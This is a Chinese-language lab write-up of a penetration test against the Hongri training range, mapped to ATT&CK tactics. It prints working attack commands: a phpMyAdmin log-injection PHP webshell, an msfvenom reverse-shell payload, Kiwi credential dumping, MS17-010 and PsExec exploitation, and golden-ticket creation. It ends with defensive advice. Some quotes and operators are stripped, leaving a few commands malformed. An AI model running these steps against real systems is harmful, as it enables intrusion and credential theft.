红日靶场实战复盘从外网打点到域控沦陷的ATTCK战术全解析在网络安全领域红日靶场因其高度仿真的企业内网环境而备受安全从业者青睐。这次我们将深入拆解一个典型的内网渗透案例从初始的外网打点开始逐步突破边界、横向移动最终实现对域控制器的完全控制。不同于简单的工具使用教程本文将重点分析每个攻击阶段对应的ATTCK战术和技术TTPs帮助读者建立攻防对抗的战术思维。1. 环境准备与初始侦察1.1 靶场拓扑与网络配置红日靶场模拟了一个典型的三层企业网络架构外网区域Kali攻击机与Win7服务器位于VM1网段192.168.41.0/24内网区域Win7作为跳板机通过第二张网卡连接VM2网段192.168.52.0/24核心区域域控制器Win Server 2008和成员服务器Win2003位于VM2网段提示实际环境中这种网络分段非常常见Web服务器通常部署在DMZ区同时具有内外网访问权限。1.2 初始信息收集技术使用Nmap进行主机发现和端口扫描是外网渗透的标准起点nmap -sn 192.168.41.0/24 # 存活主机扫描 nmap -A 192.168.41.128 # 详细服务识别常见的侦察问题及解决方案问题现象可能原因解决方案扫描不到主机网络配置错误检查网关和IP设置80端口未开放服务未启动启动phpStudy服务扫描结果异常防火墙拦截临时关闭防火墙测试ATTCK映射T1595主动扫描Active ScanningT1046网络服务扫描Network Service Scanning2. 外网突破口Web应用漏洞利用2.1 PHPMyAdmin日志注入攻击发现Win7服务器运行phpStudy环境后通过默认凭证(root/root)进入PHPMyAdmin利用日志注入获取Webshell-- 开启通用查询日志并设置路径 SET GLOBAL general_log ON; SET GLOBAL general_log_file C:/phpStudy/WWW/shell.php; -- 通过日志写入PHP代码 SELECT ?php eval($_POST[cmd]);?;技术要点利用数据库管理界面功能实现代码注入需要Web目录可写权限蚁剑连接密码需与POST参数一致2.2 Meterpreter会话建立通过Webshell上传MSF生成的木马实现持久化控制# 生成反向连接payload msfvenom -p windows/meterpreter_reverse_tcp LHOST192.168.41.129 LPORT666 -f exe -o shell.exe # MSF监听配置 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.41.129 set LPORT 666 runATTCK映射T1190利用面向公众的应用程序Exploit Public-Facing ApplicationT1059命令行界面Command-Line InterfaceT1105远程文件复制Ingress Tool Transfer3. 权限提升与凭证窃取3.1 从普通用户到SYSTEM权限在获取初始立足点后需要提升至最高权限getsystem # 尝试自动提权 ps # 列出进程 migrate 488 # 迁移至SYSTEM进程(如services.exe)3.2 使用Kiwi模块获取凭证新版Metasploit中Kiwi模块替代了传统的Mimikatzload kiwi # 加载Kiwi扩展 creds_all # 获取所有可用凭证获取到的关键凭证本地管理员Administrator/hongrisec2019!域账户后续用于横向移动ATTCK映射T1134访问令牌操纵Access Token ManipulationT1003操作系统凭证转储OS Credential DumpingT1078有效账户Valid Accounts4. 内网横向移动技术4.1 内网拓扑探测通过跳板机执行基础信息收集ipconfig /all # 查看网络配置 net view # 列出域内主机 net user /domain # 查询域用户 net group domain controllers /domain # 定位域控4.2 代理通道建立使用MSF的socks模块建立内网代理run autoroute -s 192.168.52.0/24 # 添加路由 background # 切换到后台 # 配置socks代理 use auxiliary/server/socks_proxy set SRVHOST 127.0.0.1 run配置Proxychains# /etc/proxychains4.conf socks4 127.0.0.1 10804.3 利用MS17-010漏洞横向移动对未打补丁的内网主机实施永恒之蓝攻击proxychains nmap -Pn -sT 192.168.52.141 # TCP扫描MSF利用模块use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set PAYLOAD windows/meterpreter/bind_tcp exploitATTCK映射T1210利用远程服务Exploitation of Remote ServicesT1570横向工具传输Lateral Tool TransferT1021远程服务Remote Services5. 域控攻陷与权限维持5.1 通过PsExec攻击域控制器利用获取的域管理员凭证直接攻击域控use exploit/windows/smb/psexec set RHOSTS 192.168.52.138 set SMBDomain god set SMBUser Administrator set SMBPass hongrisec2019! exploit5.2 黄金票据制作理论延伸虽然本靶场未涉及但实际攻防中常会制作黄金票据实现持久化# 需要先获取krbtgt账户的NTLM哈希 golden_ticket_create -d domain -k krbtgt_ntlm -u username -s SID -t /root/golden.tckATTCK映射T1558窃取或伪造Kerberos票据Steal or Forge Kerberos TicketsT1484域策略修改Domain Policy ModificationT1078有效账户Valid Accounts6. 攻击链路的防御思考6.1 各阶段防御建议针对本次攻击的每个阶段企业可采取的防御措施侦察阶段限制ICMP响应配置网络入侵检测系统(NIDS)初始入侵修改所有默认凭证实施最小权限原则权限提升启用LSA保护监控异常进程注入横向移动部署网络分段启用SMB签名域控攻陷保护krbtgt账户实施特权账户管理(PAM)6.2 ATTCK框架的防御价值通过映射本次攻击的TTPs安全团队可以针对性部署检测规则如Sigma规则评估现有防御体系的覆盖盲区设计更有效的红蓝对抗演练方案在真实企业环境中攻击者可能会采用更隐蔽的技术组合但基本的攻击逻辑与本次靶场演练高度一致。理解这些基础技术原理是构建深度防御能力的重要前提。